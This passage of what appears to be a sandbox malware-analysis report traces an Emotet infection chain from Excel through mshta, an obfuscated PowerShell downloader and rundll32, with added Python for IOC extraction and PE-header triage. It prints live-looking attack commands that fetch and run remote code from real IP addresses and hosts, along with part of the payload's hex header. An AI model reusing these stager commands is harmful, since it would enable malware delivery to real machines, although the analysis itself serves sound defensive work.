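$web = New-Object net.webclient;
$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11".split(",");
foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}}
Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:"""

# Leading bytes a body must start with to be what its Content-Type claims.
# Assumption of this example: a small table is enough for sandbox triage.
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/gif": b"GIF8",
    "image/jpeg": b"\xff\xd8\xff",
    "application/x-msdownload": b"MZ",
}

URL_RE = re.compile(r"\$url\d+\s*=\s*'([^']+)'")      # $urlN = '...';
PATH_RE = re.compile(r'\$path\s*=\s*"([^"]+)"')        # $path = "...";
SIZE_RE = re.compile(r"\.Length\s+-ge\s+(\d+)")        # size gate before break


def type_matches_magic(content_type, body):
    """True/False when the declared type has known magic bytes, else None."""
    mime = content_type.split(";", 1)[0].strip().lower()
    magic = MAGIC.get(mime)
    return None if magic is None else body.startswith(magic)


def extract_downloader_iocs(script):
    """Pull the blockable facts out of a downloader of this shape."""
    urls = URL_RE.findall(script)
    path = PATH_RE.search(script)
    size = SIZE_RE.search(script)
    return {
        "drop_path": path.group(1) if path else None,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "min_size": int(size.group(1)) if size else None,
        "runs_rundll32": "rundll32" in script.lower(),
    }


def triage_response(content_type, body):
    """Flag a declared-type/magic mismatch, then mine a text payload for IOCs."""
    result = {"declared": content_type,
              "magic_ok": type_matches_magic(content_type, body),
              "iocs": None}
    try:
        text = body.decode("ascii")
    except UnicodeDecodeError:
        return result                      # binary payload: nothing to mine here
    if "$url" in text and "DownloadFile" in text:   # heuristic for this family of stager
        result["iocs"] = extract_downloader_iocs(text)
    return result


if __name__ == "__main__":
    verdict = triage_response("image/png", FE_PNG_BODY.encode("ascii"))
    print("declared", verdict["declared"], "magic_ok", verdict["magic_ok"])
    for host in verdict["iocs"]["hosts"]:
        print("block:", host)
```

Run stand-alone, it reports magic_ok False for the image/png body and lists all eleven hosts, not only the one that answered. The size gate (30000 bytes) is worth keeping in the IOC set: a sinkhole or proxy that returns a short error page will be skipped by the stager and the next host tried.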


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 139.59.58.214 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:30:06.070625067 CET | 15 | OUT | GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1
                                                                          Host: ayoobeducationaltrust.in
                                                                          Connection: Keep-Alive
Jan 28, 2022 21:30:06.391297102 CET | 16 | IN | HTTP/1.1 200 OK
                                                                          Date: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Server: Apache
                                                                          Set-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/
                                                                          Cache-Control: no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          Last-Modified: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Expires: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Content-Disposition: attachment; filename="xfm.dll"
                                                                          Content-Transfer-Encoding: binary
                                                                          Content-Length: 548864
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B
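The Data Raw dump of session 2 contains the complete PE header and section table of the payload, which is enough to answer the questions a responder asks before the file is even extracted: is it a DLL, 32- or 64-bit, when was it linked, where does execution start, and how big should the whole file be. The Python below is an added example, not part of the Joe Sandbox report. Its input is the report's own dump: the DOS header and everything from the PE signature through the section table are copied verbatim from the hex above; offsets 0x40-0xef (the DOS stub and Rich header) are zero-filled because the parser never reads them, which is this example's one liberty with the data.

```python
import struct
from datetime import datetime, timezone

# Bytes copied from the report's Data Raw dump of the xfm.dll response
# (HTTP session 2). 0x40-0xef (DOS stub, Rich header) are zero-filled here;
# nothing below reads them. Everything else is verbatim.
DUMP = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"   # 0x000  e_magic "MZ"
    "b8000000000000004000000000000000"   # 0x010
    "00000000000000000000000000000000"   # 0x020
    "000000000000000000000000f0000000"   # 0x030  e_lfanew = 0xf0
) + bytes(0xf0 - 0x40) + bytes.fromhex(
    "504500004c0105003efaf36100000000"   # 0x0f0  PE\0\0, Machine, NumberOfSections, TimeDateStamp
    "00000000e00002210b01080000500400"   # 0x100  SizeOfOptionalHeader, Characteristics, Magic 0x10b
    "0000040000000000060d030000100000"   # 0x110  AddressOfEntryPoint at 0x118
    "00600400000000100010000000100000"   # 0x120  ImageBase at 0x124
    "04000000000000000400000000000000"   # 0x130
    "00a008000010000098df080002000000"   # 0x140  SizeOfImage, SizeOfHeaders, CheckSum, Subsystem
    "00001000001000000000100000100000"   # 0x150
    "0000000010000000402d050052000000"   # 0x160  NumberOfRvaAndSizes, export directory
    "341005000401000000a0050050560200"   # 0x170  import and resource directories
    "00000000000000000000000000000000"   # 0x180
    "00000800304e00000000000000000000"   # 0x190  base relocation directory
    "00000000000000000000000000000000"   # 0x1a0
    "000000000000000090bd040040000000"   # 0x1b0  load config directory
    "00000000000000000060040094050000"   # 0x1c0  IAT
    "ac0f0500400000000000000000000000"   # 0x1d0  delay import directory
    "00000000000000002e74657874000000"   # 0x1e0  section table starts at 0x1e8: .text
    "39450400001000000050040000100000"   # 0x1f0
    "00000000000000000000000020000060"   # 0x200
    "2e7264617461000092cd000000600400"   # 0x210  .rdata
    "00d00000006004000000000000000000"   # 0x220
    "00000000400000402e64617461000000"   # 0x230  .data
    "80650000003005000030000000300500"   # 0x240
    "000000000000000000000000400000c0"   # 0x250
    "2e727372630000005056020000a00500"   # 0x260  .rsrc
    "00600200006005000000000000000000"   # 0x270
    "00000000400000402e72656c6f630000"   # 0x280  .reloc
    "629300000000080000a0000000c00700"   # 0x290
    "00000000000000000000000040000042"   # 0x2a0
)

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "i386", 0x8664: "amd64"}


def parse_pe_header(data):
    """Read just enough of a PE32 image for triage; raises on anything else."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here (PE32+ lays ImageBase out differently)")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    sections = []
    for i in range(nsections):               # IMAGE_SECTION_HEADER is 40 bytes; first 24 suffice
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_ptr": rptr, "raw_size": rsize})
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"])), None)
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "is_32bit": bool(chars & IMAGE_FILE_32BIT_MACHINE),
        "is_executable": bool(chars & IMAGE_FILE_EXECUTABLE_IMAGE),
        "link_time_utc": datetime.fromtimestamp(timestamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "image_base": image_base,
        "entry_rva": entry,
        "entry_section": entry_section,
        "size_of_image": size_of_image,
        # last byte of file data the section table accounts for
        "expected_file_size": max(s["raw_ptr"] + s["raw_size"] for s in sections),
        "sections": sections,
    }


if __name__ == "__main__":
    info = parse_pe_header(DUMP)
    for key, value in info.items():
        if key != "sections":
            print(f"{key:20} {value}")
    for s in info["sections"]:
        print(f"{s['name']:8} va={s['va']:#08x} raw={s['raw_ptr']:#08x}+{s['raw_size']:#x}")
```

Three things fall out of this that the report's Data Ascii line does not show directly. The Characteristics word 0x2102 marks a 32-bit DLL, which is why the downloader in session 1 launches it through C:\Windows\SysWow64\rundll32.exe on this 64-bit guest rather than an .exe or the native rundll32. The link timestamp 0x61f3fa3e is 2022-01-28 14:14:22 UTC, about six hours before the Date header on the response, so the DLL was built the same day it was served. And the section table accounts for exactly 0x86000 = 548864 bytes, matching the Content-Length, so the sandbox received the complete file.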



                                                                          Target ID:0
                                                                          Start time:21:29:20
                                                                          Start date:28/01/2022
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                          Imagebase:0x13f410000
                                                                          File size:28253536 bytes
                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:2
                                                                          Start time:21:29:22
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                                                                          Imagebase:0x4abd0000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:4
                                                                          Start time:21:29:23
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\mshta.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:mshta http://91.240.118.168/vvv/ppp/fe.html
                                                                          Imagebase:0x13f1b0000
                                                                          File size:13824 bytes
                                                                          MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:6
                                                                          Start time:21:29:26
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                          Imagebase:0x13fba0000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          Target ID:8
                                                                          Start time:21:29:38
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                          Imagebase:0x4abd0000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:9
                                                                          Start time:21:29:39
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:10
                                                                          Start time:21:29:42
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:11
                                                                          Start time:21:30:04
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:12
                                                                          Start time:21:30:08
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:14
                                                                          Start time:21:30:27
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          Target ID:15
                                                                          Start time:21:30:32
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
